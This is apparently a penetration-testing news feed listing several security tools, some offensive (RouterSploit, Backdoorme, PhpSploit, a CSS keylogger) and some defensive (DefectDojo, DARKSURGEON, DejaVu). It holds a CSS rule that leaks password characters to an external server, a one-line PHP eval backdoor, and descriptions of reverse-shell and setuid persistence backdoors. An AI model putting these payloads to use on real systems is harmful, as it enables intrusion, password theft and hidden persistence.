Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

RouterSploit v3.0 - Exploitation Framework For Embedded Devices

$
0
0

The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.


It consists of various modules that aids penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check if a target is vulnerable to any exploit
  • payloads - modules that are responsible for generating payloads for various architectures and injection points
  • generic - modules that perform generic attacks

Installation

Requirements
Required:
  • future
  • requests
  • paramiko
  • pysnmp
  • pycrypto
Optional:
  • bluepy - bluetooth low energy

Installation on Kali Linux
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on Ubuntu 18.04 & 17.10
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth Low Energy support:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installation on OSX
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Running on Docker
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Update
Update RouterSploit Framework often. The project is under heavy development and new modules are shipped almost every day.
cd routersploit
git pull



DefectDojo - Application Vulnerability Correlation And Security Orchestration Application

$
0
0

DefectDojo is a security program and vulnerability management tool. DefectDojo allows you to manage your application security program, maintain product and application information, schedule scans, triage vulnerabilities and push findings into defect trackers. Consolidate your findings into one source of truth with DefectDojo.

Quick Start
$ git clone https://github.com/DefectDojo/django-DefectDojo
$ cd django-DefectDojo
$ ./setup.bash
$ ./run_dojo.bash
navigate to 127.0.0.1:8000

Demo
If you'd like to check out a demo of DefectDojo before installing it, you can check out our PythonAnywhere demo site.

You can log in as an administrator like so:

You can also log in as a product owner / non-staff user:

Additional Documentation
For additional documentation you can visit our Read the Docs site.

Installation Options

Debian, Ubuntu (16.04.2+) or RHEL-based Install Script
Docker
Ansible

Getting Started
We recommend checking out the about document to learn the terminology of DefectDojo, and the getting started guide for setting up a new installation. We've also created some example workflows that should give you an idea of how to use DefectDojo for your own team.

DefectDojo Client API's
  • DefectDojo Python API: pip install defectdojo_api or clone the repository.


Backdoorme - Powerful Auto-Backdooring Utility

$
0
0

Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.
Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.
Please only use Backdoorme with explicit permission - please don't hack without asking.

Usage
Backdoorme is split into two parts: backdoors and modules.
Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.
Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.

Setup
To start backdoorme, first ensure that you have the required dependencies.
For Python 3.5+:
$ sudo apt-get install python3 python3-pip python3-tk nmap                                 
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
For Python 2.7:
$ sudo python dependencies.py

Getting Started
Launching backdoorme:
$ python master.py
To add a target:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>

Backdoors
To use a backdoor, simply run the "use" keyword.
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.
(msf) >> show options
Backdoor options:

Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:

Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
As in metasploit, backdoors are organized by category.
  • Auxiliary
    • keylogger - Adds a keylogger to the system and gives the option to email results back to you.
    • simplehttp - installs python's SimpleHTTP server on the client.
    • user - adds a new user to the target.
    • web - installs an Apache Server on the client.
  • Escalation
    • setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
    • shell - the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.
  • Shell
    • bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
    • bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
    • sh - Similar to the first bash backdoor, but redirects input to /bin/sh.
    • sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh.
    • metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
    • java - creates a socket connection using libraries from Java and compiles the backdoor on the target.
    • ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash.
    • netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
    • netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell.
    • perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
    • php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module
    • python - uses a short python script to perform commands and send output back to the user.
    • web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.
  • Access
    • remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
    • ssh_key - creates RSA key and copies to target for a passwordless ssh connection.
    • ssh_port - Adds a new port for ssh.
  • Windows
    • windows - Uses msfvenom to create a windows backdoor.

Modules
Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.
(msf) >> add poison
+ Poison module added
Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.
(msf) >> help
...
Poison module options:

Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
Currently enabled modules include:
  • Poison
  • Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor.
  • For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.
  • Cron
  • Adds an existing backdoor to the root user's crontab to run with a given frequency.
  • Web
  • Sets up a web server and places a web page which triggers the backdoor.
  • Simply visit the site with your listener open and the backdoor will begin.
  • User
  • Adds a new user to the target.
  • Startup
  • Allows for backdoors to be spawned with the bashrc and init files.
  • Whitelist
  • Whitelists an IP so that only that IP can connect to the backdoor.

Targets
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.


BlackArch Linux v2018.06.01 - Penetration Testing Distribution

$
0
0

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1981tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:
  • added more than 60 new tools
  • added config files for i3-wm (BlackArch compatible))
  • network stack tunings (sysctl + tuning.sh)
  • added system/pacman clean-up script (consistency++)
  • switched to terminus font (console, LXDM, WMs, x-terminals, ...)
  • replaced second browser midori with chromium
  • really, a lot of clean-ups and many tweaks!
  • renamed ISO filename
  • fixed awesome-wm quit/exit issue
  • fixed system group and user failures
  • fixed kernel module load failures
  • update blackarch installer to version 0.7 (bugfix + many improvements)
  • included linux kernel 4.16.12
  • updated all blackarch tools and packages including config files
  • updated all system packages
  • updated all window manager menus (awesome, fluxbox, openbox)
  • re-add multilib

Download and Installation

BlackArch Linux only takes a moment to setup.
There are three ways to go:
  1. Install on an existing Arch machine.
  2. Use the live ISO.
  3. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk.

CSS Keylogger - Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

$
0
0

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension
  1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu's icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension in the directory which you downloaded this repository.

Setup Express server
  1. yarn
  2. yarn start

Haxking l33t passw0rds
  1. Open a website that uses a controlled component framework such as React. https://instagram.com.
  2. Press the extension C on the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the express server.

How it works
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.
For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Using a simple script one can create a css file that will send a custom request for every ASCII character.


DARKSURGEON - A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

$
0
0

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.
DARKSURGEON has three stated goals:
  • Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. 
  • Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
  • Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.
If you haven't worked with packer before, this project has a simple premise:
Provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.
Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles
DARKSURGEON is based on a few key development principles:
  • Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.
  • Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.
  • Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. 
  • Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
  • Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Hardening
DARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.
All default installations of DARKSURGEON have the following security features enabled:
  • Windows Secure Boot is Enabled.
  • Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
  • Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
  • Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)
  • Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)
  • LLMNR is Disabled.
  • NBT is Disabled.
  • WPAD is Removed.
  • Powershell v2 is Removed.
  • SMB v1 is Removed.
  • Application handlers for commonly-abused file extensions are changed to notepad.exe.
Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.
Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls.
In Low Security mode, the following hardening features are configured:
  • Windows Defender Anti-Virus Real-Time Scanning is Disabled.
  • Windows Defender SmartScreen is Disabled.
  • Windows Defender Credential Guard is Disabled.
  • Windows Defender Exploit Guard is Disabled.
  • Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.
  • Windows Defender Application Guard is Disabled.
  • Windows Defender Application Guard does not enforce isolation.
Note: High Security mode is still in development.
High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration.
In High Security mode, the following hardening features are configured:
  • Windows Defender Anti-Virus Real-Time Scanning is Enabled.
  • Windows Defender SmartScreen is Enabled and applied to All Traffic.
  • Windows Defender Credential Guard is Enabled.
  • Windows Defender Exploit Guard is Enabled.
  • Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.
  • Windows Defender Application Guard is Enabled.
  • Windows Defender Application Guard enforces isolation.

Telemetry
Whether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:

Privacy
Your operational environment contains some of the most sensitive data from your network, and it's important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:
  • Windows 10 telemetry settings are configured to minimize collection.
  • Cortana, diagnostics, tracking, and other services are disabled.
  • Windows Error Reporting (WER) is disabled.
  • Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. 
  • Microsoft Guidance for reducing telemetry and data collection has been implemented.

Packages
Out of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.
Android Analysis:
Tools, scripts, and binaries focused on android analysis and reverse engineering.
  • APKTool (FLARE)
Blue Team:
Tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development.
  • ACE
  • Bloodhound / Sharphound
  • CimSweep
  • Dumpsterfire
  • EndGame Red Team Automation (RTA)
  • Kansa
  • Posh-Git
  • Invoke-ATTACKAPI
  • LOLBAS (Living Off the Land Binaries And Scripts)
  • OSX Collector
  • Posh-SecMod
  • Posh-Sysmon
  • PowerForensics
  • PowerSploit
  • Practical Malware Analysis Labs (FLARE)
  • Revoke-Obfuscation
  • Yara (FLARE)
Debuggers:
Tools, scripts, and binaries for debugging binary artifacts.
  • Ollydbg (FLARE)
  • OllyDump (FLARE)
  • OllyDumpEx (FLARE)
  • Ollydbg2 (FLARE)
  • OllyDump2Ex (FLARE)
  • x64dbg (FLARE)
  • Windbg (FLARE)
Disassemblers:
Tools, scripts, and binaries for disassembling binary artifacts.
  • IDA Free Trial (FLARE)
  • Binary Ninja Demo (FLARE)
  • Radare2 (FLARE)
Document Analysis: Tools, scripts, and binaries for performing analysis of documents.
  • OffVis (FLARE)
  • OfficeMalScanner (FLARE)
  • PDFId (FLARE)
  • PDFParser (FLARE)
  • PDFStreamDumper (FLARE)
DotNet Analysis:
Tools, scripts, and binaries for performing analysis of DotNet artifacts.
  • DE4Dot (FLARE)
  • DNSpy (FLARE)
  • DotPeek (FLARE)
  • ILSpy (FLARE)
Flash Analysis:
Tools, scripts, and binaries for performing analysis of flash artifacts.
  • FFDec (FLARE)
Forensic Analysis:
Tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts.
  • Amcache Parser
  • AppCompatCache Parser
  • IISGeolocate
  • JLECmd
  • LECmd
  • JumpList Explorer
  • PECmd
  • Registry Explorer
  • Regshot (FLARE)
  • Shellbags Explorer
  • Timeline Explorer
  • TSK (The Sleuthkit)
  • Volatility
  • X-Ways Forensics Installer Manager (XWFIM)
Hex Editors:
  • FileInsight (FLARE)
  • HxD (FLARE)
  • 010 Editor (FLARE)
Java Analysis:
  • JD-GUI (FLARE)
  • Dex2JAR
Network Analysis:
  • Burp Free
  • FakeNet-NG (FLARE)
  • Wireshark (FLARE)
PE Analysis:
  • DIE (FLARE)
  • EXEInfoPE (FLARE)
  • Malware Analysis Pack (MAP) (FLARE)
  • PEiD (FLARE)
  • ExplorerSuite (CFF Explorer) (FLARE)
  • PEStudio (FLARE)
  • PEview (FLARE)
  • Resource Hacker (FLARE)
  • VirusTotal Uploader
Powershell Modules:
  • Active Directory
  • Azure Management
  • Pester
Python Libraries:
  • Cryptography
  • Hexdump
  • OLETools
  • LXML
  • Pandas
  • Passivetotal
  • PEFile
  • PyCryptodome
  • Scapy
  • Shodan
  • Sigma
  • Visual C++ for Python
  • Vivisect
  • WinAppDBG
  • Yara-Python
Red Team:
  • Grouper
  • Inveigh
  • Nmap
  • Powershell Empire
  • PowerupSQL
  • PSAttack
  • PSAttack Build Tool
  • Responder
Remote Management:
  • AWS Command Line (AWSCLI)
  • OpenSSH
  • Putty
  • Remote Server Administration Tools (RSAT)
Utilities:
  • 1Password
  • 7Zip
  • Adobe Flash Player
  • Adobe Reader
  • API Monitor
  • Bleachbit
  • Boxstarter
  • Bstrings
  • Checksum
  • Chocolatey
  • Cmder
  • Containers (Hyper-V)
  • Curl
  • Cyber Chef
  • Docker
  • DotNet 3.5
  • DotNet 4
  • Exiftool
  • FLOSS (FLARE)
  • Git
  • GoLang
  • Google Chrome
  • GPG4Win
  • Hashcalc
  • Hashdeep
  • Hasher
  • Hashtab
  • Hyper-V
  • Irfanview
  • Java JDK8
  • Java JRE8
  • JQ
  • Jupyter
  • Keepass
  • Microsoft Edge
  • Mozilla Firefox
  • Mozilla Thunderbird
  • Neo4j Community
  • NodeJS
  • Nuget
  • Office365 ProPlus
  • OpenVPN
  • Osquery
  • Python 2.7
  • Qbittorrent
  • RawCap
  • Slack
  • Sublime Text 3
  • Sysinternals Suite
  • Tor Browser
  • UnixUtils
  • UPX
  • Visual C++ 2005
  • Visual C++ 2008
  • Visual C++ 2010
  • Visual C++ 2012
  • Visual C++ 2013
  • Visual C++ 2015
  • Visual C++ 2017
  • Visual Studio Code
  • Windows 10 SDK
  • Windows Subsystem for Linux (WSL)
  • Winlogbeat
  • XorSearch
  • XorStrings
Visual Basic Analysis:
  • VBDecompiler

Building DARKSURGEON

Build Process
DARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.
  1. Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).
  2. The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).
  3. Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.
  4. Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. 
  5. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.
  1. Install packer, vagrant, and your preferred hypervisor on your host.
  2. Download the repository contents to your host.
  3. Download a Windows 10 Enterprise Evaluation ISO (1803).
  4. Move the ISO file to your local DARKSURGEON repository.
  5. Update DARKSURGEON.json with the ISO SHA1 hash and file name.
  6. (Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don't trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1
  7. Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Configuring DARKSURGEON
DARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.
Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they'll be copied over to the host for you.
Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.

Using DARKSURGEON
Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.
Once DARKSURGEON has successfully built, you'll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.
  1. Install vagrant and your preferred hypervisor on your host.
  2. Navigate to the DARKSURGEON repository (or the location where you've saved the DARKSURGEON box file). 
  3. Perform a vagrant up: vagrant up
Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one?
Easy, just perform the following: vagrant destroy && vagrant up
Once the DARKSURGEON virtual machine is running, you can login using one of the two local accounts:
Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.
Administrator Account:
Username: Darksurgeon
Password: darksurgeon
Local User Account:
Username: Unprivileged
Password: unprivileged
If you'd rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.

Downloading DARKSURGEON
If you'd rather skip the process of building DARKSURGEON and want to trust the box file I've built, you can simply download it here.

Contributing
Contributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.

Frequently Asked Questions

Why is Hyper-V the preferred hypervisor?
I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other Hypervisors are not recommended on the host machine. I will do my best to accomodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.

Why does the entire packer build fail on a chocolatey package error?
This was a design decision that was made to guarantee that all packages which were expected made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted the build pipeline, as transient or chocolatey errors may cause a build to fail.
If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.

Does this project support using a Chocolatey Professional/Business/Consultant license?
Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.

Why are the build functions broken into dozens of individual powershell scripts
Flexibility is key. You may opt to use -- or not use -- any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.

I want to debug the build. How do I do so?
Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.

Troubleshooting

The packer build process never starts and hangs on the UEFI screen.
This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.

Packer timed out during the build. I didn't receive an error.
Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.

My VM is running, but packer doesn't seem to connect via WinRM.
Connect to the guest and check the following:
  • WinRM is accessible from your packer host. (Test-NetConnection -ComputerName <Packer IP Address> -Port 5985)
  • WinRM is allowed on the guest firewall.

I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?
Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.

DejaVU - Open Source Deception Framework

$
0
0
Deception techniques if deployed well can be very effective for organizations to improve network defense and can be a useful arsenal for blue teams to detect attacks at very early stage of cyber kill chain. But the challenge we have seen is deploying, managing and administering decoys across large networks is still not easy and becomes complex for defenders to manage this over time. Although there are a lot of commercial tools in this space, we haven’t come across open source tools which can achieve this.

With this in mind, we have developed DejaVu which is an open source deception framework which can be used to deploys across the infrastructure. This could be used by the defender to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS) strategically across their network on different VLAN’s. To ease the management of decoys, we have built a web based platform which can be used to deploy, administer and configure all the decoys effectively from a centralized console. Logging and alerting dashboard displays detailed information about the alerts generated and can be further configured on how these alerts should be handled. If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted, this can be configured which effectively would mean very few false positives.

Alerts only occur when an adversary is engaged with the decoy, so now when the attacker touches the decoy during reconnaissance or performs authentication attempts this raises a high accuracy alert which should be investigated by the defense. Decoys can also be placed on the client VLAN’s to detect client side attacks such as responder/LLMNR attacks using client side decoys. Additionally, common attacks which the adversary uses to compromise such as abusing Tomcat/SQL server for initial foothold can be deployed as decoys, luring the attacker and enabling detection.
Video demo for tool is published here: Youtube URL

Architecture

  • Host OS: Primary OS hosting the DejaVU virtual box. Note: Primary
    host can be OS independent Windows/Linux and can be based on
    corporate hardening guidelines.
  • DejaVu Virtual Box: Debian based image containing open source deception framework to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS).
  • Networking
    • Management Interface – An interface to access web based management console. (Recommended to be isolated from internal network.)
    • Decoy Interface – Trunk/Access interface for inbound connections from different networks towards the interactive decoys. (Recommended to block outbound connections from this interface)
    • Virtual Interfaces – Interfaces bridged with decoy interface to channel traffic towards the decoys.
  • Server Dockers – Docker based service containers– HTTP(Tomcat/Apache), SQL, SMB, FTP, SSH
  • Client Dockers – Docker based client container – NBNS client
  • Management Console (Web + DB) – A centralized console to deploy, administer and configure all the decoys effectively along with logging and alerting dashboard to display detailed information about the alerts generated.

Usage Guide
Initial Setup
  1. Configure Username/Password for admin panel
php config.php --username=<provide username> --password=<provide password> --email=<provide email>
  1. Default URL to access admin panel - http://192.168.56.102
  2. Virtualbox network adapter type should be "PCNet"(full name is something like PCnet-FAST III)
  3. Set SMTP configuration on "mailalert.php" to recieve Email alerts
Now when you go to the default URL, you are greeted by the logon prompt:


Add Server Decoy
  1. To add a decoy, we first need to add a VLAN on which we want to later deploy Decoys.
    • Select Decoy Management -> Add VLAN
    • Enter the VLAN ID. Use the “List Available VLANs” option to list the VLANs tagged on the interface.

  1. To add server decoy :
    • Select Decoy Management ->Add Server Decoy
    • Provide the details for new decoy as shown below. Select the services (SMB/FTP/MySQL/FTP/Web Server/SSH) to be deployed, use dynamic or provide a static IP address.

  1. Let’s do some port scan's + Auth attempts from attacker machine on server VLAN and analyze the alerts

  1. View the alerts triggered when the attacker scanned our decoy and tried to authenticate.
    • Select Log Management -> List Events

Add Client Decoy
  1. To add Client Decoy
    • Select Decoy Management ->Add Client Decoy
    • Provide the details for new decoy as shown below. It’s recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.

  1. Let’s run responder from attacker machine on end user VLAN and analyze the alerts

  1. View the alerts triggered when the attacker scanned our decoy and tried to authenticated.
    • Log management -> List Events

Filter Alerts
  1. Alerts can be configured based on various parameters. Example – Don’t send alerts from IP – 10.1.10.101. If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted.

To Do
  • Code Cleanup and sanitization
  • Persistance on reboot
  • Add client side decoys generating HTTP, FTP traffic
  • ISO image
  • Wiki

Authors
Bhadresh Patel (@bhdresh)
Harish Ramadoss (@hramados)


DumpsterDiver - Tool To Search Secrets In Various Filetypes

$
0
0

DumpsterDiver is a tool used to analyze big volumes of various file types in search of hardcoded secret keys (e.g. AWS Access Key, Azure Share Key or SSH keys). Additionally, it allows creating a simple search rules with basic conditions (e.g. reports only csv file including at least 10 email addresses). The main idea of this tool is to detect any potential secret leaks.

Key features:
  • it uses Shannon Entropy to find private keys.
  • it supports multiprocessing for analyzing files.
  • it unpacks compressed archives (e.g. zip, tar.gz etc.)
  • it supports advanced search using simple rules (details below)

Usage
usage: DumpsterDiver.py [-h] -p LOCAL_PATH [-r] [-a]

Command line options
  • -p LOCAL_PATH - path to the folder containing files to be analyzed.
  • -r, --remove - when this flag is set, then files which don't contain any secret (or anything interesting if -a flag is set) will be removed.
  • -a, --advance - when this flag is set, then all files will be additionally analyzed using rules specified in 'rules.yaml' file.

Pre-requisites
To run the DumpsterDiver you have to install python libraries. You can do this by running the following command:
pip install -r requirements.txt

Understanding config.yaml file
There is no single tool which fits for everyone's needs and the DumpsterDiver is not an exception here. So, in config.yaml file you can custom the program to search exactly what you want. Below you can find a description of each setting.
  • logfile - specifies a file where logs should be saved.
  • excluded - specifies file extensions which you don't want to omit during a scan. There is no point in searching for hardcoded secrets in picture or video files, right?
  • min_key_length and min_key_length - specifies minimum and maximum length of the secret you're looking for. Depending on your needs this setting can greatly limit the amount of false positives. For example, the AWS secret has a length of 40 bytes so if you set min_key_length and min_key_length to 40 then the DumpsterDiver will analyze only 40 bytes strings. However, it won't take into account longer strings like Azure shared key or private SSH key.

Advanced search:
The DumpsterDiver supports also an advanced search. Beyond a simple grepping with wildcards this tool allows you to create conditions. Let's assume you're searching for a leak of corporate emails. Additionaly, you're interested only in a big leaks, which contain at least 100 email addresses. For this purpose you should edit a 'rules.yaml' file in the following way:
filetype: [".*"]
filetype_weight: 0
grep_words: ["*@example.com"]
grep_words_weight: 10
grep_word_occurrence: 100
Let's assume a different scenario, you're looking for terms "pass", "password", "haslo", "hasło" (if you're analyzing polish company repository) in a .db or .sql file. Then you can achieve this by modifying a 'rules.yaml' file in the following way:
filetype: [".db", ".sql"]
filetype_weight: 5
grep_words: ["*pass*", "*haslo*", "*hasło*"]
grep_words_weight: 5
grep_word_occurrence: 1
Note that the rule will be triggered only when the total weight (filetype_weight + grep_words_weight) is >=10.



PhpSploit - Stealth Post-Exploitation Framework

$
0
0

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features
  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
